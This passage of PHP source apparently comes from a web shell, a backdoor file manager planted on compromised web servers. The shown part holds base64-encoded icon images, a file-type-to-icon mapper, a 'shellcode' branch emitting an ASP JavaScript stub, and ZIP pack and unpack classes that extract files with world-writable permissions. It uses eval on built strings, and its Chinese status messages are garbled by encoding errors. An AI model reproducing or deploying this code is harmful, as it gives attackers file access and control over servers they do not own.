"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/" . "/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b" . "OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC" . "aNOmRcjVj02tPxPCzfkvIAA7"); header('Content-type: image/gif'); echo base64_decode($images[$img]); die; } function css_showimg($file) { $it = substr($file, -3); switch ($it) { case "jpg": case "gif": case "bmp": case "png": case "ico": return 'img'; break; case "htm": case "tml": return 'html'; break; case "exe": case "com": return 'exe'; break; case "xml": case "doc": return 'xml'; break; case ".js": case "vbs": return 'js'; break; case "mp3": case "wma": case "wav": case "swf": case ".rm": case "avi": case "mp4": case "mvb": return 'mp3'; break; case "rar": case "tar": case ".gz": case "zip": case "iso": return 'rar'; break; default: return 'txt'; break; } } function css_js($num, $code = '') { if ($num == "shellcode") { return '<%@ LANGUAGE="JavaScript" %> <% %>'; } html_n(''); } function css_left() { html_n(''); html_n('
'); } function css_main() { html_n(' '); } function css_foot() { html_n('
'); } class eanver { var $out = ''; function eanver($dir) { if (@function_exists('gzcompress')) { if (count($dir) > 0) { foreach ($dir as $file) { if (is_file($file)) { $filecode = file_get_contents($file); if (is_array($dir)) { $file = basename($file); } $this->filezip($filecode, $file); } } $this->out = $this->packfile(); } return true; } else { return false; } } var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "PK\5\6\0\0\0\0"; var $old_offset = 0; function at($atunix = 0) { $unixarr = $atunix == 0 ? getdate() : getdate($atunix); if ($unixarr['year'] < 1980) { $unixarr['year'] = 1980; $unixarr['mon'] = 1; $unixarr['mday'] = 1; $unixarr['hours'] = 0; $unixarr['minutes'] = 0; $unixarr['seconds'] = 0; } return $unixarr['year'] - 1980 << 25 | $unixarr['mon'] << 21 | $unixarr['mday'] << 16 | $unixarr['hours'] << 11 | $unixarr['minutes'] << 5 | $unixarr['seconds'] >> 1; } function filezip($data, $name, $time = 0) { $name = str_replace('\\', '/', $name); $dtime = dechex($this->at($time)); $hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x' . $dtime[2] . $dtime[3] . '\\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "PK\3\4"; $fr .= "\24\0"; $fr .= "\0\0"; $fr .= "\10\0"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $this->datasec[] = $fr; $new_offset = strlen(implode('', $this->datasec)); $cdrec = "PK\1\2"; $cdrec .= "\0\0"; $cdrec .= "\24\0"; $cdrec .= "\0\0"; $cdrec .= "\10\0"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name)); $cdrec .= pack('v', 0); $cdrec .= pack('v', 0); $cdrec .= pack('v', 0); $cdrec .= pack('v', 0); $cdrec .= pack('V', 32); $cdrec .= pack('V', $this->old_offset); $this->old_offset = $new_offset; $cdrec .= $name; $this->ctrl_dir[] = $cdrec; } function packfile() { $data = implode('', $this->datasec); $ctrldir = implode('', $this->ctrl_dir); return $data . $ctrldir . $this->eof_ctrl_dir . pack('v', sizeof($this->ctrl_dir)) . pack('v', sizeof($this->ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\0\0"; } } class zip { var $total_files = 0; var $total_folders = 0; function Extract($zn, $to, $index = array(-1)) { $ok = 0; $zip = @fopen($zn, 'rb'); if (!$zip) { return -1; } $cdir = $this->ReadCentralDir($zip, $zn); $pos_entry = $cdir['offset']; if (!is_array($index)) { $index = array($index); } for ($i = 0; $index[$i]; $i++) { if (intval($index[$i]) != $index[$i] || $index[$i] > $cdir['entries']) { return -1; } } for ($i = 0; $i < $cdir['entries']; $i++) { @fseek($zip, $pos_entry); $header = $this->ReadCentralFileHeaders($zip); $header['index'] = $i; $pos_entry = ftell($zip); @rewind($zip); fseek($zip, $header['offset']); if (in_array("-1", $index) || in_array($i, $index)) { $stat[$header['filename']] = $this->ExtractFile($header, $to, $zip); } } fclose($zip); return $stat; } function ReadFileHeader($zip) { $binary_data = fread($zip, 30); $data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data); $header['filename'] = fread($zip, $data['filename_len']); if ($data['extra_len'] != 0) { $header['extra'] = fread($zip, $data['extra_len']); } else { $header['extra'] = ''; } $header['compression'] = $data['compression']; $header['size'] = $data['size']; $header['compressed_size'] = $data['compressed_size']; $header['crc'] = $data['crc']; $header['flag'] = $data['flag']; $header['mdate'] = $data['mdate']; $header['mtime'] = $data['mtime']; if ($header['mdate'] && $header['mtime']) { $hour = ($header['mtime'] & 0xf800) >> 11; $minute = ($header['mtime'] & 0x7e0) >> 5; $seconde = ($header['mtime'] & 0x1f) * 2; $year = (($header['mdate'] & 0xfe00) >> 9) + 1980; $month = ($header['mdate'] & 0x1e0) >> 5; $day = $header['mdate'] & 0x1f; $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); } else { $header['mtime'] = time(); } $header['stored_filename'] = $header['filename']; $header['status'] = "ok"; return $header; } function ReadCentralFileHeaders($zip) { $binary_data = fread($zip, 46); $header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data); if ($header['filename_len'] != 0) { $header['filename'] = fread($zip, $header['filename_len']); } else { $header['filename'] = ''; } if ($header['extra_len'] != 0) { $header['extra'] = fread($zip, $header['extra_len']); } else { $header['extra'] = ''; } if ($header['comment_len'] != 0) { $header['comment'] = fread($zip, $header['comment_len']); } else { $header['comment'] = ''; } if ($header['mdate'] && $header['mtime']) { $hour = ($header['mtime'] & 0xf800) >> 11; $minute = ($header['mtime'] & 0x7e0) >> 5; $seconde = ($header['mtime'] & 0x1f) * 2; $year = (($header['mdate'] & 0xfe00) >> 9) + 1980; $month = ($header['mdate'] & 0x1e0) >> 5; $day = $header['mdate'] & 0x1f; $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); } else { $header['mtime'] = time(); } $header['stored_filename'] = $header['filename']; $header['status'] = 'ok'; if (substr($header['filename'], -1) == '/') { $header['external'] = 0x41ff0010; } return $header; } function ReadCentralDir($zip, $zip_name) { $size = filesize($zip_name); if ($size < 277) { $maximum_size = $size; } else { $maximum_size = 277; } @fseek($zip, $size - $maximum_size); $pos = ftell($zip); $bytes = 0x0; while ($pos < $size) { $byte = @fread($zip, 1); $bytes = $bytes << 8 | ord($byte); if ($bytes == 0x504b0506 or $bytes == 0x2e706870504b0506) { $pos++; break; } $pos++; } $fdata = fread($zip, 18); $data = @unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size', $fdata); if ($data['comment_size'] != 0) { $centd['comment'] = fread($zip, $data['comment_size']); } else { $centd['comment'] = ''; } $centd['entries'] = $data['entries']; $centd['disk_entries'] = $data['disk_entries']; $centd['offset'] = $data['offset']; $centd['disk_start'] = $data['disk_start']; $centd['size'] = $data['size']; $centd['disk'] = $data['disk']; return $centd; } function ExtractFile($header, $to, $zip) { $header = $this->readfileheader($zip); if (substr($to, -1) != "/") { $to .= "/"; } if ($to == './') { $to = ''; } $pth = explode("/", $to . $header['filename']); $mydir = ''; for ($i = 0; $i < count($pth) - 1; $i++) { if (!$pth[$i]) { continue; } $mydir .= $pth[$i] . "/"; if (!is_dir($mydir) && @mkdir($mydir, 0777) || ($mydir == $to . $header['filename'] || $mydir == $to && $this->total_folders == 0) && is_dir($mydir)) { @chmod($mydir, 0777); $this->total_folders++; echo "Ŀ¼: {$mydir}
"; } } if (strrchr($header['filename'], '/') == '/') { return; } if (!($header['external'] == 0x41ff0010) && !($header['external'] == 16)) { if ($header['compression'] == 0) { $fp = @fopen($to . $header['filename'], 'wb'); if (!$fp) { return -1; } $size = $header['compressed_size']; while ($size != 0) { $read_size = $size < 2048 ? $size : 2048; $buffer = fread($zip, $read_size); $binary_data = pack('a' . $read_size, $buffer); @fwrite($fp, $binary_data, $read_size); $size -= $read_size; } fclose($fp); touch($to . $header['filename'], $header['mtime']); } else { $fp = @fopen($to . $header['filename'] . '.gz', 'wb'); if (!$fp) { return -1; } $binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']), Chr(0x0), time(), Chr(0x0), Chr(3)); fwrite($fp, $binary_data, 10); $size = $header['compressed_size']; while ($size != 0) { $read_size = $size < 1024 ? $size : 1024; $buffer = fread($zip, $read_size); $binary_data = pack('a' . $read_size, $buffer); @fwrite($fp, $binary_data, $read_size); $size -= $read_size; } $binary_data = pack('VV', $header['crc'], $header['size']); fwrite($fp, $binary_data, 8); fclose($fp); $gzp = @gzopen($to . $header['filename'] . '.gz', 'rb') or die("Cette archive est compress"); if (!$gzp) { return -2; } $fp = @fopen($to . $header['filename'], 'wb'); if (!$fp) { return -1; } $size = $header['size']; while ($size != 0) { $read_size = $size < 2048 ? $size : 2048; $buffer = gzread($gzp, $read_size); $binary_data = pack('a' . $read_size, $buffer); @fwrite($fp, $binary_data, $read_size); $size -= $read_size; } fclose($fp); gzclose($gzp); touch($to . $header['filename'], $header['mtime']); @unlink($to . $header['filename'] . '.gz'); } } $this->total_files++; echo "�ļ�: {$to}{$header['filename']}
"; return true; } } ob_end_flush();